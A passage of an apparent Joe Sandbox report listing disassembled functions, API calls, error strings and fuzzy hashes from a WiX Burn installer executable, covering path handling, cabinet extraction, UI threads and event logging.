API String ID: 3286166115-2967768451
Opcode ID: 934e72f36ae26867a28b100da30efa3cbabc3080b7316b3d06bdebe72a1faae3
Instruction ID: abed3b348c50bc975a31a2f35a63fec10c634d7fedcd66a974525b9b4834e5ca
Opcode Fuzzy Hash: 934e72f36ae26867a28b100da30efa3cbabc3080b7316b3d06bdebe72a1faae3
Instruction Fuzzy Hash: 298138F5A40226EBDB258E598CC5BAF36A8AB01720F114119FFD5EB2C0E7F5CD0086D0

Function 000C3076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 000C30C1
GetLastError.KERNEL32 ref: 000C30C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 000C3121
GetLastError.KERNEL32 ref: 000C3127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C31DB
GetLastError.KERNEL32 ref: 000C31E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C323B
GetLastError.KERNEL32 ref: 000C3245

Strings

@, xrefs: 000C309B
pathutil.cpp, xrefs: 000C30EB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: @$pathutil.cpp
API String ID: 1547313835-3022285739
Opcode ID: 79a183d9ae8cc5fcca4a3ffc39887e6f8d7501f2c0702db835097315c251c11f
Instruction ID: 28b18784c2434a2865138a564bf956c7ebaebadf740abc836d793e013697365a
Opcode Fuzzy Hash: 79a183d9ae8cc5fcca4a3ffc39887e6f8d7501f2c0702db835097315c251c11f
Instruction Fuzzy Hash: 9F61A073D10229ABDF219BE48885FDEBBB8AB04750F158169EE41BB251E775DF008BD0

Function 000C2DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 000C2E5F
GetLastError.KERNEL32 ref: 000C2E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 000C2F09
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 000C2F96
GetLastError.KERNEL32 ref: 000C2FA3
Sleep.KERNEL32(00000064), ref: 000C2FB7
CloseHandle.KERNEL32(?), ref: 000C301F

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 000C2F66
4Mw, xrefs: 000C2E5F
pathutil.cpp, xrefs: 000C2E8D

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4Mw$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-721117420
Opcode ID: e7a63eb67ef5e783dc85a3cecb95d396d91191c98f515330d0fbd4e3feb3d343
Instruction ID: 8dbcd0096ec3b1dd7fe2f8fcff245c6ee485259c0a0485a0c1aa76e0b948a9cb
Opcode Fuzzy Hash: e7a63eb67ef5e783dc85a3cecb95d396d91191c98f515330d0fbd4e3feb3d343
Instruction Fuzzy Hash: 2C717472D01229ABDB709F94DC89FEEB3B8AB08710F1041A9F944B7291D7759E81CF90

Function 000D4D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 000D4DC0
StringFromGUID2.OLE32(?,?,00000027), ref: 000D4DEF
UuidCreate.RPCRT4(?), ref: 000D4E3A
StringFromGUID2.OLE32(?,?,00000027), ref: 000D4E66

Strings

Failed to convert pipe guid into string., xrefs: 000D4E0C
pipe.cpp, xrefs: 000D4E00, 000D4E4D
Failed to create pipe guid., xrefs: 000D4DCD
Failed to allocate pipe name., xrefs: 000D4E2F
Failed to allocate pipe secret., xrefs: 000D4E8F
BurnPipe.%s, xrefs: 000D4E1B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 6ebbcde638c7fe718cf5e123bf007e3772147252fb3d9e8a7ed103f6a06d1ca2
Instruction ID: 70b1fc79d19148d2cbf3e2b54da9f9689421f965420f25b1bec1a09cc8d2411e
Opcode Fuzzy Hash: 6ebbcde638c7fe718cf5e123bf007e3772147252fb3d9e8a7ed103f6a06d1ca2
Instruction Fuzzy Hash: B8418C72D40308BBDB20DBE4DD45EDEB7F9AB44B10F20412AF905BB241DB759985CBA0

Function 000DEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,000C548E,?,?), ref: 000DEA9D
GetLastError.KERNEL32(?,000C548E,?,?), ref: 000DEAAA
CreateThread.KERNEL32(00000000,00000000,000DE7B4,?,00000000,00000000), ref: 000DEB03
GetLastError.KERNEL32(?,000C548E,?,?), ref: 000DEB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,000C548E,?,?), ref: 000DEB4B
CloseHandle.KERNEL32(00000000,?,000C548E,?,?), ref: 000DEB6A
CloseHandle.KERNEL32(?,?,000C548E,?,?), ref: 000DEB77

Strings

uithread.cpp, xrefs: 000DEACB, 000DEB31
Failed to create initialization event., xrefs: 000DEAD5
Failed to create the UI thread., xrefs: 000DEB3B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 3d3d9a2cc285988de291a328bef1e0de493ad6e2f6b6166512b514dd387e256b
Instruction ID: f2aa09078c5d8459b83c0c801330bed6c95046bf775dcc661346ae248305f04d
Opcode Fuzzy Hash: 3d3d9a2cc285988de291a328bef1e0de493ad6e2f6b6166512b514dd387e256b
Instruction Fuzzy Hash: 4B318576D01219BBD710AF99CD85A9FBAB8FB04760F114166B914FB340E770AE4086A1

Function 000DE645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,000C548E,?,?), ref: 000DE666
GetLastError.KERNEL32(?,?,000C548E,?,?), ref: 000DE673
CreateThread.KERNEL32(00000000,00000000,000DE3C8,00000000,00000000,00000000), ref: 000DE6D2
GetLastError.KERNEL32(?,?,000C548E,?,?), ref: 000DE6DF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,000C548E,?,?), ref: 000DE71A
CloseHandle.KERNEL32(?,?,?,000C548E,?,?), ref: 000DE72E
CloseHandle.KERNEL32(?,?,?,000C548E,?,?), ref: 000DE73B

Strings

Failed to create modal event., xrefs: 000DE69E
splashscreen.cpp, xrefs: 000DE694, 000DE700
Failed to create UI thread., xrefs: 000DE70A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: f73c36831aeca4bd16300f0d427e211451433274cae05b4aa6fadf493d385c84
Instruction ID: 25f07f2bb0e00133d3fc3659158a1e0ced01f54a5ea952f81812c51a0f7d243c
Opcode Fuzzy Hash: f73c36831aeca4bd16300f0d427e211451433274cae05b4aa6fadf493d385c84
Instruction Fuzzy Hash: E131B576D00329BBDB219B99DC45A9FBBF8EF44750F114166FD20FA340E7709A408AE0

Function 000E14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,774D2F60,?,?,000C5405,000C53BD,00000000,000C5445), ref: 000E1506
GetLastError.KERNEL32 ref: 000E1519
GetExitCodeThread.KERNEL32(0010B488,?), ref: 000E155B
GetLastError.KERNEL32 ref: 000E1569
ResetEvent.KERNEL32(0010B460), ref: 000E15A4
GetLastError.KERNEL32 ref: 000E15AE

Strings

Failed to wait for operation complete event., xrefs: 000E154A
cabextract.cpp, xrefs: 000E1540, 000E1590, 000E15D5
Failed to reset operation complete event., xrefs: 000E15DF
Failed to get extraction thread exit code., xrefs: 000E159A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: c4fa50b38e1b1a4fce7f01ce57b4e4daa4ffafc5e902aa3a5eff9e18704b3ce1
Instruction ID: 8a528134e7cacb4841575a1bcd1c63fab37c6d9dae71ddef86935c7140ec7385
Opcode Fuzzy Hash: c4fa50b38e1b1a4fce7f01ce57b4e4daa4ffafc5e902aa3a5eff9e18704b3ce1
Instruction Fuzzy Hash: FE31D472B01745EFDB109F668D41BEF7BF8EF44700B10802AF942EA160EB71DA409B51

Function 000E15FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0010B478,?,00000000,?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000,?), ref: 000E161B
GetLastError.KERNEL32(?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000,?,000C5489,FFF9E89D,000C5489), ref: 000E1625
WaitForSingleObject.KERNEL32(0010B488,000000FF,?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000,?,000C5489), ref: 000E165F
GetLastError.KERNEL32(?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000,?,000C5489,FFF9E89D,000C5489), ref: 000E1669
CloseHandle.KERNEL32(00000000,000C5489,?,00000000,?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000), ref: 000E16B4
CloseHandle.KERNEL32(00000000,000C5489,?,00000000,?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000), ref: 000E16C3
CloseHandle.KERNEL32(00000000,000C5489,?,00000000,?,000CC1D3,?,000C53BD,00000000,?,000D784D,?,000C566D,000C5479,000C5479,00000000), ref: 000E16D2

Strings

cabextract.cpp, xrefs: 000E1649, 000E168D
Failed to wait for thread to terminate., xrefs: 000E1697
Failed to set begin operation event., xrefs: 000E1653

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: 486ccfb15410392320bfb80ac7f47a84ec812e1c0ec7b1738e68a2b51efa30a8
Instruction ID: d0c566928222f7637a818864765e7e1a0b4428a6c0a30a261ec448028e8decdc
Opcode Fuzzy Hash: 486ccfb15410392320bfb80ac7f47a84ec812e1c0ec7b1738e68a2b51efa30a8
Instruction Fuzzy Hash: 03213833501A22BFC7255B62CC49BDABAE0FF08721F190225F94476DA0D7B5EC90CAD9

Function 000D41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00100523: EnterCriticalSection.KERNEL32(0012B5FC,00000000,?,?,?,000D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,000C54FA,?), ref: 00100533
Part of subcall function 00100523: LeaveCriticalSection.KERNEL32(0012B5FC,?,?,0012B5F4,?,000D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,000C54FA,?), ref: 0010067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 000D4212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 000D421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,001139D4,00000000), ref: 000D426B
CloseEventLog.ADVAPI32(00000000), ref: 000D4272

Strings

Setup, xrefs: 000D41FC
txt, xrefs: 000D41F2
_Failed, xrefs: 000D41F7
Application, xrefs: 000D420C
Failed to open Application event log, xrefs: 000D424C
logging.cpp, xrefs: 000D4242

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: d43d7d1a96b1bee0db3095d95b2ef0c57b39afa94403c47ec573d3543ad4e9a8
Instruction ID: 5efe5cf2123c745cbaf46a057f687401b0b8d7180d380e7b9a22c610d0cfc590
Opcode Fuzzy Hash: d43d7d1a96b1bee0db3095d95b2ef0c57b39afa94403c47ec573d3543ad4e9a8
Instruction Fuzzy Hash: 78F0A437A897717BD63626621C0EEBF5D7CDFC6F217410129BDA0F5285EB94898180F8

Function 000D93FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 000D949E
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 000D94C6

Strings

Could not close verify handle., xrefs: 000D9655
0, xrefs: 000D955E
Failed to allocate string., xrefs: 000D9534
Failed to allocate memory, xrefs: 000D946F
Failed to encode file hash., xrefs: 000D9551
$, xrefs: 000D959D
Failed to get file hash., xrefs: 000D94F0
Could not verify file %ls., xrefs: 000D9607
cache.cpp, xrefs: 000D94E6, 000D95FA, 000D964B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: 014830009657ccc6c70fc18c0a76605fde1d61628c9ca715e2b96e0cb3c35b25
Instruction ID: 89423da0ca2a9dbb4d74a8f722be0b3948394bf5b4f1dddae4de019dbbb26234
Opcode Fuzzy Hash: 014830009657ccc6c70fc18c0a76605fde1d61628c9ca715e2b96e0cb3c35b25
Instruction Fuzzy Hash: 06715D72D00329ABDB21DF94C841FEEB7B8AF08720F11412AF915BB381E7759D418BA0

Function 000DE56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 000DE577
DefWindowProcW.USER32(?,00000082,?,?), ref: 000DE5B5
SetWindowLongW.USER32(?,000000EB,00000000), ref: 000DE5C2
SetWindowLongW.USER32(?,000000EB,?), ref: 000DE5D1
DefWindowProcW.USER32(?,?,?,?), ref: 000DE5DF
CreateCompatibleDC.GDI32(?), ref: 000DE5EB
SelectObject.GDI32(00000000,00000000), ref: 000DE5FC
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 000DE61E
SelectObject.GDI32(00000000,00000000), ref: 000DE626
DeleteDC.GDI32(00000000), ref: 000DE629
PostQuitMessage.USER32(00000000), ref: 000DE637

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: 25a6663a07f881647ea7319e8159abd7bc643cf6b956e9f56061a014905211d7
Instruction ID: ffbaccf179958e4d21983182f13772d740afe65cdb7f633677425bc9df6af30c
Opcode Fuzzy Hash: 25a6663a07f881647ea7319e8159abd7bc643cf6b956e9f56061a014905211d7
Instruction Fuzzy Hash: DD21AC32108248BFDB246F68EC4CD7B3FA8FF493A0B154519F6568A2B4D7B18850DB60

Function 000DA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

Failed to get bundle layout directory property., xrefs: 000DA287
Failed to combine layout source with source., xrefs: 000DA2A4
Failed to copy source path., xrefs: 000DA31A
WixBundleOriginalSource, xrefs: 000DA1B7
WixBundleLayoutDirectory, xrefs: 000DA26C
Failed to get current process directory., xrefs: 000DA1F3
Failed to combine last source with source., xrefs: 000DA210
WixBundleLastUsedSource, xrefs: 000DA1A1

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 32e54220eec839c6cca6b76b2c82e727e4cb9ff8106fa1b1a1c82a7dde27ff82
Instruction ID: 9cd97a7d9233f13bc5758b3dce7cf984ade65de0fc262f7d1de0aba65d7ec05d
Opcode Fuzzy Hash: 32e54220eec839c6cca6b76b2c82e727e4cb9ff8106fa1b1a1c82a7dde27ff82
Instruction Fuzzy Hash: C0716D71E05319AFCF16DFA8C841AFEB7BAAF09310F14012AF901B7251D7729E408B62

Function 00106D50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,774CDFD0,?,001072C8,?,?), ref: 00106DA6
SysFreeString.OLEAUT32(00000000), ref: 00106E11
SysFreeString.OLEAUT32(00000000), ref: 00106E89
SysFreeString.OLEAUT32(00000000), ref: 00106EC8

Strings

term, xrefs: 00106DD9
scheme, xrefs: 00106DB9
label, xrefs: 00106D98

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$Free$Compare
String ID: label$scheme$term
API String ID: 1324494773-4117840027
Opcode ID: bea731628da841da5ab59061799dacd6351b96222cc044d78e2b2de89c23f149
Instruction ID: 55c1076b3a6fa275ebedbef2f953caf65adf4710934db773b828127b1932a233
Opcode Fuzzy Hash: bea731628da841da5ab59061799dacd6351b96222cc044d78e2b2de89c23f149
Instruction Fuzzy Hash: 62515D35901219EBCB15DB94CC44FEEBBB8EF04721F2042A9E551AB2E0D7B09E60DB50

Function 000CCBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,000C53BD,00000000,000C5489,000C5445,WixBundleUILevel,840F01E8,?,00000001), ref: 000CCC1C

Strings

payload.cpp, xrefs: 000CCD1D
Failed to extract file., xrefs: 000CCCE7
Payload was not found in container: %ls, xrefs: 000CCD29
Failed to ensure directory exists, xrefs: 000CCCEE
Failed to concat file paths., xrefs: 000CCCFC
Failed to get next stream., xrefs: 000CCD03
Failed to find embedded payload: %ls, xrefs: 000CCC48
Failed to get directory portion of local file path, xrefs: 000CCCF5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 7ba964dabbd64a7969ea735977c318a8297ba43c633e26bbe13c7fb16775baa4
Instruction ID: ef7df07e49d1a31ad8a0b0502ffdf4a4e75065ec6dfdbde9113928c72f36b0c5
Opcode Fuzzy Hash: 7ba964dabbd64a7969ea735977c318a8297ba43c633e26bbe13c7fb16775baa4
Instruction Fuzzy Hash: 3741A031941219EBDF259F84CC81FAEBBB5BF00710F15816DE84EAB2A2D7719D41DB90

Function 000C4796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 000C47BB
GetCurrentThreadId.KERNEL32 ref: 000C47C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000C484F

Strings

wininet.dll, xrefs: 000C47EE
engine.cpp, xrefs: 000C489B
Failed to create engine for UX., xrefs: 000C47DB
Failed to load UX., xrefs: 000C4804
Failed to start bootstrapper application., xrefs: 000C481D
Unexpected return value from message pump., xrefs: 000C48A5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: d93795a17c70a0da9044d961fd1512ce9d478bc4dfe43fd75949124b8fecb91f
Instruction ID: b2b8f6e1ba8b713cde6c73ccc9acde9d5860e8d47334ed58d9ff2faee828c7f8
Opcode Fuzzy Hash: d93795a17c70a0da9044d961fd1512ce9d478bc4dfe43fd75949124b8fecb91f
Instruction Fuzzy Hash: 5941C171A04215BFEB209BA0CC95FBEB7ACFF04314F10022AF905E7291DB71AD4887A0

Function 000E9C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

APIs

